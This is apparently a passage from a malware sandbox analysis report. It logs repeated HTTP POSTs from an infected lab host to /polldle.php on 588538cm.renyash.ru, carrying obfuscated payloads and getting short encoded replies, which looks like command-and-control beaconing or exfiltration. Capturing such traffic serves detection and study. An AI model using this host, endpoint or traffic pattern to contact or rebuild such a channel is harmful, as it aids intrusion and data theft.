                                                                                Data Ascii: XQTWZDZ[T]UZP_Y^P\Z[WTP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -3%?%263-4%[,++/13).;""/X?%#X'/\/(
                                                                                Jan 11, 2025 23:34:22.754982948 CET1236OUTData Raw: 3a 55 04 0b 34 3f 1b 05 30 31 3f 3b 3c 06 25 07 3b 41 33 5b 31 2b 02 3d 07 2b 23 12 30 0f 3f 20 05 08 5a 1e 39 3b 3f 2a 3b 20 2b 13 22 36 26 3b 04 5c 30 37 3b 06 3d 07 0b 2c 1a 38 3f 0a 31 3d 26 11 05 11 3f 04 37 3b 04 20 2a 10 3c 08 05 18 30 35
                                                                                Data Ascii: :U4?01?;<%;A3[1+=+#0? Z9;?*; +"6&;\07;=,8?1=&?7; *<05/)8Y=T,14^50$*%,"87*/7<</&![+9=(10(-=<:[(^(X0 $853-0=4"6#!0<98-_&-'Y248>9**=.47[U806':0:(
                                                                                Jan 11, 2025 23:34:22.833591938 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:23.054723978 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDOUvRrb6Z2WWKhWFaHt1q193mP2i5E2ZvXJ%2FDtL%2FyiF7MpdtUmzoCyY6K9BbDwsMGoUnemGjGuyjjkXtwF1NZUomSohy0AI3zHB4bwlVvbZfhR6979AAGMDCukqXYB0Y8vIwi1k"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fb47b614352-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3996&min_rtt=2538&rtt_var=3869&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=102751&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                115192.168.2.450123104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:23.182759047 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:23.536339045 CET2504OUTData Raw: 5d 5c 51 53 5f 43 5f 58 54 5d 55 5a 50 5f 59 5d 50 5d 5a 59 57 57 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QS_C_XT]UZP_Y]P]ZYWWPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,3928X%%Y$:7<1,+;)/2:''!2;[+#X'/\/(
                                                                                Jan 11, 2025 23:34:23.636280060 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                116192.168.2.450124104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:23.792531967 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:24.145536900 CET1620OUTData Raw: 58 5e 51 52 5a 41 5a 5c 54 5d 55 5a 50 54 59 5f 50 50 5a 5a 57 5c 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^QRZAZ\T]UZPTY_PPZZW\PZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .3&D&+812'? ?5/+,((&U.S9$\!#(#X'/\/
                                                                                Jan 11, 2025 23:34:24.236550093 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:24.436311007 CET963INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lqeW4bUunBuAqBElAFJpP%2BJOOvwA2rVp%2FNNn7f7pcFQ0F1av1BruRuDuAf8OwD%2FWXn5ttB%2BSd7WsS0%2BbsgHC%2Fu3sn%2B4dmUNlAZAf4TXHQef7dejYUD10H%2BAJy5hUvwy1JzMMwxIC"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fbd3cbbc457-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1463&rtt_var=852&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=545182&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 1e 26 24 3c 1e 3d 39 0e 06 2d 16 3b 12 2e 21 2f 03 29 08 31 02 20 39 24 5d 25 32 3b 0f 2b 2a 2a 1b 3c 3a 0a 0d 34 58 3e 1c 25 13 23 46 0c 1d 22 12 3e 59 24 56 26 12 0a 59 29 33 0f 00 31 1c 2c 45 28 34 01 51 3e 5c 31 5d 22 3c 21 0d 28 21 29 18 2a 43 21 04 2f 31 23 11 24 2a 2e 51 0f 16 21 54 22 08 33 00 22 3e 3c 06 25 33 3b 5f 3c 34 3c 5b 26 04 0a 14 3c 1d 2e 5e 28 0c 20 56 30 3d 27 12 26 2f 0c 5f 28 39 27 53 28 2b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.&$<=9-;.!/)1 9$]%2;+**<:4X>%#F">Y$V&Y)31,E(4Q>\1]"<!(!)*C!/1#$*.Q!T"3"><%3;_<4<[&<.^( V0='&/_(9'S(+$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                117192.168.2.450125104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:23.991456985 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:24.349858999 CET2504OUTData Raw: 5d 5d 54 50 5a 42 5a 5f 54 5d 55 5a 50 5f 59 5e 50 55 5a 5a 57 5d 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TPZBZ_T]UZP_Y^PUZZW]PY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.U*&$!&$4%_88'+?V%397(]#!'[*%#X'/\/(
                                                                                Jan 11, 2025 23:34:24.445517063 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:24.683984995 CET802INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wV2aMy3KE89R71vOqfoNGOXSn4zz2Vnk1kqX41obpSYL0u%2BfD6W7kRVx6CuUolN5%2FRoFZJ5SFMwv7H8EPXX3G9By23U3USTex2Sy%2BKFeI2b9Mw8zlGdQCLpBOWvTN81o%2FfYtxPaJ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fbe8e8e8cb4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3320&min_rtt=1965&rtt_var=3448&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=113955&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:34:24.772527933 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                118192.168.2.450126104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:24.903994083 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:25.255024910 CET2504OUTData Raw: 5d 59 54 54 5f 45 5a 59 54 5d 55 5a 50 55 59 51 50 56 5a 59 57 51 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTT_EZYT]UZPUYQPVZYWQPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F:U6D%Z$!6%/.#[,]+)?S%:-Z5\+#X'/\/
                                                                                Jan 11, 2025 23:34:25.375793934 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:25.617631912 CET810INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cQagGyaV6mrDBVvj3eRDb1IExY1M8xgpVSaQzeCks4T4Cprgl%2BB5E3Fs2%2F%2Bsu%2FkJFj7XIYtv1pL%2BOD8RWJ00iRBeN9rASIFkk%2FKD4XTwpKvaZOY7aaLWVLcbsgXa3vlWVaP3DgM"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fc44ebb41cd-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4486&min_rtt=1763&rtt_var=6107&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=61998&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                119192.168.2.450127104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:25.746139050 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:26.098711967 CET2504OUTData Raw: 58 5d 51 50 5a 47 5a 58 54 5d 55 5a 50 54 59 5a 50 52 5a 5a 57 53 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]QPZGZXT]UZPTYZPRZZWSPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@. *D&^0$2939S49[;8 +/?1#9("(#X'/\/
                                                                                Jan 11, 2025 23:34:26.209597111 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:26.455501080 CET810INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:26 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yh9Vh%2BqKsvRbmFsQ7JTZP1qV9oAi09prl3y7FVaFDXKXOLBTCCEcpzqG6WofXZJ1OyxYPBIsl8Egx4WmyOaFTJmKo%2FbBtIrp5jZvMjHCOxAeLQKYCjn%2FMx%2F9YJ%2FaA5ZJTvW1Tw%2By"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fc98cf84333-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3465&min_rtt=1671&rtt_var=4214&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=91119&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                120192.168.2.450128104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:26.594919920 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:26.942418098 CET2504OUTData Raw: 58 5f 54 52 5a 49 5a 5f 54 5d 55 5a 50 59 59 58 50 5d 5a 5f 57 51 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X_TRZIZ_T]UZPYYXP]Z_WQPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 90)1(]&>39 %88$+?,$39-47"T#X(5#X'/\/0
                                                                                Jan 11, 2025 23:34:27.042316914 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:27.280797005 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yt4dnyQqXAwkRDquYQFt%2B%2BoD7pLumfGlP0ADgTO%2B8offs%2BUI9hiSHvJ6YRlMAE1JHWi0zvX4qTu9t4W3RSTgnSpxh5522Td3Hr73oBESi3lrbUWEWrvzH7NFs7BoaNj1AP1StueR"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fcecc7d8c69-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4726&min_rtt=2045&rtt_var=6129&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=62140&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                121192.168.2.450129104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:27.494982958 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2496
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:27.848972082 CET2496OUTData Raw: 58 51 54 57 5a 44 5f 5c 54 5d 55 5a 50 5c 59 58 50 5d 5a 53 57 50 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTWZD_\T]UZP\YXP]ZSWPP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-$8/1!&%?%S /=^,87^?<(1 :-[!!3Y(#X'/\/
                                                                                Jan 11, 2025 23:34:27.939373970 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:28.220211983 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTRwtgzaNUN%2FBTOYt3txj%2BK4kulbPNqnPiysjJdGzh5Bv%2FHBcXVGI4K1p6xsbB3SmMeNh%2Fgaonq01U5zF63fyBGxxTMHm8IK770cBOofSyMQrMlc2yKpfEfVnQ4CAkif0Y2qzNmS"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fd45da743ad-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1636&rtt_var=970&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=476345&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                122192.168.2.450130104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:28.358536005 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:28.708201885 CET2504OUTData Raw: 5d 5c 51 57 5f 45 5f 5f 54 5d 55 5a 50 5b 59 5e 50 50 5a 5d 57 55 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QW_E__T]UZP[Y^PPZ]WUPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.6&8]%2',)V4Z"88?(<7U$3- Z"!/<#X'/\/
                                                                                Jan 11, 2025 23:34:28.824124098 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:29.069459915 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:29 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMvcVFenA89GJhZL7p9BHe6uc4T3f%2BjjLLA8onPVJpSPXnHwck32HZqO29ewSHr%2FSiMHj7ZFMO4zxd9mS3IfTWS4A0uQJJZqjKzR72rDzkpCzeD8uSYhg7Mj5L8i%2B3AKDgxb%2FpjC"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fd9dd9d726f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3122&min_rtt=1934&rtt_var=3102&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=127588&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                123192.168.2.450131104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:29.226295948 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                124192.168.2.450132104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:29.448821068 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1596
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:29.801899910 CET1596OUTData Raw: 58 5e 54 56 5a 48 5a 58 54 5d 55 5a 50 54 59 58 50 54 5a 5f 57 55 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^TVZHZXT]UZPTYXPTZ_WUP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9.E$( [$15_01W "84+#R&:W.B<!?\(#X'/\/
                                                                                Jan 11, 2025 23:34:29.911459923 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:30.094750881 CET949INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AT1J4lmX9ivX5PSCtME5riBQp8058hM1VTkUPT0BFMh9S7zVL5z9nWEK5T3LpgW14%2BCCtbmOGjBXNyJeFAjuUtH1QiRDUutQz1Zol8pTB0nvHKSeTS6gKKFbDudTFMoeEEnRQUUn"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fe0aa75420d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3630&min_rtt=1792&rtt_var=4348&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1915&delivery_rate=88490&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
